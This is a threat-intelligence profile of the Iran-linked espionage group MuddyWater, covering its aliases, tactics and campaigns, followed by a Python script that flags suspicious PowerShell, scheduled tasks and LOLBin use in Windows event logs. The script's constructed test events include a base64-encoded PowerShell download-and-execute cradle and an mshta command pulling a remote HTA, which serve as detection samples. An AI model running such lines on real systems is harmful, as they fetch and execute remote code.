MuddyWater: Iran-Linked Espionage Group Expanding Global Reach

Introduction

MuddyWater, also known as Earth Vetala, Seedworm, COBALT ULSTER, TA450, Static Kitten, Mango Sandstorm, MERCURY, G0069, Boggy Serpens, ATK51, and TEMP.Zagros, is an advanced persistent threat (APT) group aligned with Iran, active since at least 2015. The U.S. government has publicly assessed MuddyWater to be a subordinate element of Iran's Ministry of Intelligence and Security (MOIS). The group conducts strategic cyberespionage operations against governments, telecom providers, defense contractors, and non-governmental organizations in the Middle East, Europe, and North America.

MuddyWater takes a long-term approach to its operations, favoring persistence and adaptability over technical sophistication, and continues to evolve its tooling and methodology.

Identity and Motivation

MuddyWater has been widely attributed to Iranian state-sponsored cyber operations. The primary motivation behind MuddyWater operations is intelligence gathering in support of Tehran’s geopolitical objectives, focusing on monitoring regional stakeholders, projecting influence, and enhancing Iran’s cyber capabilities.

MuddyWater also runs regional operations against organizations in Israel, Saudi Arabia, and Western countries, often returning to previously compromised victims or their partner organizations to exfiltrate, or to facilitate access to, sensitive political, defense, and energy-related information.

Aliases: Earth Vetala, ATK51, Seedworm, COBALT ULSTER, TA450, Static Kitten, Mango Sandstorm, MERCURY, G0069, Boggy Serpens, TEMP.Zagros.


TTPs (Tactics, Techniques and Procedures)

MuddyWater employs persistent but low-sophistication capabilities. It is known for using legitimate tools, open-source frameworks, and custom PowerShell malware to maintain persistent access.

Techniques: Credential theft, lateral movement through the use of stolen administrator accounts, use of living-off-the-land binaries (LOLBins), and data exfiltration through encrypted channels.

Initial Access: Phishing and spear-phishing messages containing malware-laced documents; exploitation of internet-facing applications with unpatched vulnerabilities.

Persistence: Registry modifications, malicious scheduled tasks, abuse of legitimate remote administration tools, and compromised administrator credentials.

Command and Control (C2): Use of open-source frameworks, custom scripts, and publicly available malware to maintain stealthy communication channels with the victim’s environment.

Malware and Tools: POWERSTATS, PowGoop, Small Sieve, MuddyC3, and malicious PowerShell/VBS scripts.

Notable Operations

2017–2018: Conducted mass phishing campaigns against government and telecommunications organizations in the Middle East.

2019: Extended their operational reach to Europe, targeting the academic and NGO sectors.

2020: Used open-source frameworks along with custom PowerShell malware in espionage campaigns.

2022: In January, U.S. Cyber Command publicly attributed MuddyWater to MOIS and released samples of the open-source-based tooling the group used for credential theft and remote access; a joint advisory from CISA, the FBI, and partner agencies followed in February. Targeting increasingly focused on the defense and energy sectors of Israel and Saudi Arabia.

2023: Expanded target scope to include North American research institutions and European government agencies.

2024–2025: Phishing and credential theft operations continued and expanded across Europe, North America, and the Middle East while using a mixture of open-source and custom malware.


Recent Developments

As of 2025, MuddyWater remains an operational Iranian cyber espionage threat actor. It continues to evolve its tactics, for example by combining publicly available tools with its own custom malware, which complicates both attribution and detection. While MuddyWater's tradecraft is generally considered low-level, its persistence, adaptability, and close alignment with Iranian state objectives keep it relevant in the global threat landscape. The group is increasingly targeting sectors associated with critical infrastructure and energy security, consistent with Iran's interest in monitoring and influencing adversaries' energy security and regional policy engagement.

Conclusion

MuddyWater is a high-risk state-sponsored cyber espionage threat actor. It does not match the technical sophistication of its peers; however, its consistency, adaptability, and geopolitical alignment make it a serious threat across multiple jurisdictions.

Defensive Takeaways

  • Train staff to identify phishing and spear-phishing emails.
  • Deploy timely patches to public-facing software applications.
  • Look for anomalous usage of PowerShell and scheduled tasks.
  • Detect anomalous credential usage and lateral movement.
  • Leverage threat intelligence capabilities to detect indicators of compromise associated with MuddyWater campaigns.
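The TTPs above (encoded or download-cradle PowerShell, scheduled tasks pointing at scripts in user-writable paths, LOLBin proxy execution) and the detection takeaways in this list can be turned into a simple triage routine. The following is an added example written for this page, not code from Brandefense or from any MuddyWater report. It runs over constructed, hypothetical log records shaped like PowerShell script block logging (Event ID 4104), scheduled task creation (Event ID 4698) and process creation (Sysmon Event ID 1 / Security 4688); the scoring thresholds, the heuristics and the 203.0.113.5 documentation-range address are the example's own assumptions, not campaign indicators.

```python
"""Triage Windows event exports for MuddyWater-style PowerShell and task abuse.

Added example (not from the original article). The heuristics are generic to
the TTPs listed in the profile, not vendor IOCs; all events below are constructed.
"""
import base64
import re
from dataclasses import dataclass, field

# -EncodedCommand and its short forms, followed by a base64 blob (UTF-16LE text).
ENCODED_CMD = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{20,})", re.I)
# Download cradles commonly seen in PowerShell loaders.
DOWNLOAD_CRADLE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer)", re.I)
# Hidden window / execution policy bypass switches.
HIDDEN_BYPASS = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|nop|noprofile|ep\s+bypass|executionpolicy\s+bypass)", re.I)
# Signed Windows binaries frequently abused for proxy execution (LOLBins).
LOLBINS = {"mshta.exe", "rundll32.exe", "regsvr32.exe", "wscript.exe",
           "cscript.exe", "certutil.exe", "bitsadmin.exe"}
URL = re.compile(r"https?://", re.I)
# Scheduled task actions living in user-writable locations or pointing at scripts.
SUSPICIOUS_TASK_PATH = re.compile(
    r"(\\AppData\\|\\ProgramData\\|\\Public\\|\\Temp\\|\.ps1\b|\.vbs\b|\.js\b)", re.I)


@dataclass
class Finding:
    event_id: int
    host: str
    score: int
    reasons: list[str] = field(default_factory=list)


def decode_encoded_command(blob: str) -> str:
    """Decode a -EncodedCommand blob (base64 of UTF-16LE); '' if it is not one."""
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_commandline(cmd: str):
    """Score one command line / script block; returns (score, reasons)."""
    score, reasons = 0, []
    m = ENCODED_CMD.search(cmd)
    if m:
        score += 3
        reasons.append("encoded PowerShell command")
        cmd = cmd + " " + decode_encoded_command(m.group(1))  # inspect the decoded payload too
    if DOWNLOAD_CRADLE.search(cmd):
        score += 3
        reasons.append("download cradle")
    if HIDDEN_BYPASS.search(cmd):
        score += 2
        reasons.append("hidden window / execution policy bypass")
    tokens = cmd.split()
    exe = tokens[0].strip('"').rsplit("\\", 1)[-1].lower() if tokens else ""
    if exe in LOLBINS:
        score += 2
        reasons.append(f"LOLBin {exe}")
        if URL.search(cmd):  # LOLBin fetching remote content is rarely legitimate
            score += 2
            reasons.append("LOLBin pulling remote content")
    return score, reasons


def score_task(action: str):
    """Score a scheduled task's action the same way, plus its location on disk."""
    score, reasons = score_commandline(action)
    if SUSPICIOUS_TASK_PATH.search(action):
        score += 2
        reasons.append("task action in user-writable path or script file")
    return score, reasons


def triage(events, threshold: int = 4):
    """Return a Finding for every event scoring at or above the threshold."""
    findings = []
    for ev in events:
        if ev["id"] == 4104:
            score, reasons = score_commandline(ev["script"])
        elif ev["id"] == 4698:
            score, reasons = score_task(ev["action"])
        elif ev["id"] in (1, 4688):
            score, reasons = score_commandline(ev["cmdline"])
        else:
            continue
        if score >= threshold:
            findings.append(Finding(ev["id"], ev["host"], score, reasons))
    return findings


# Constructed sample: build the encoded blob the way an operator would.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')"
BLOB = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"id": 4104, "host": "ws01", "script": r"Get-ChildItem C:\Users -Recurse | Measure-Object"},
    {"id": 4688, "host": "ws01", "cmdline": f"powershell.exe -nop -w hidden -enc {BLOB}"},
    {"id": 4698, "host": "ws02", "action": r"wscript.exe C:\Users\Public\Libraries\update.vbs"},
    {"id": 4698, "host": "srv01", "action": r'"C:\Program Files\Backup\backup.exe" /daily'},
    {"id": 4688, "host": "ws03", "cmdline": "mshta.exe http://203.0.113.5/x.hta"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.host} event {f.event_id} score {f.score}: {', '.join(f.reasons)}")
```

Run as-is it reports the encoded download cradle, the scheduled task running a VBS from C:\Users\Public, and mshta.exe pulling a remote HTA, and stays silent on the two benign records. In production the same logic would read real 4104/4698/4688 exports, and the threshold and weights would be tuned against the environment's baseline of legitimate PowerShell and task activity.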

As Tehran’s use of cyber operations continues to project power and manage strategic intelligence, MuddyWater will no doubt be a key component of Iran’s offensive cyber ecosystem through 2025 and beyond.
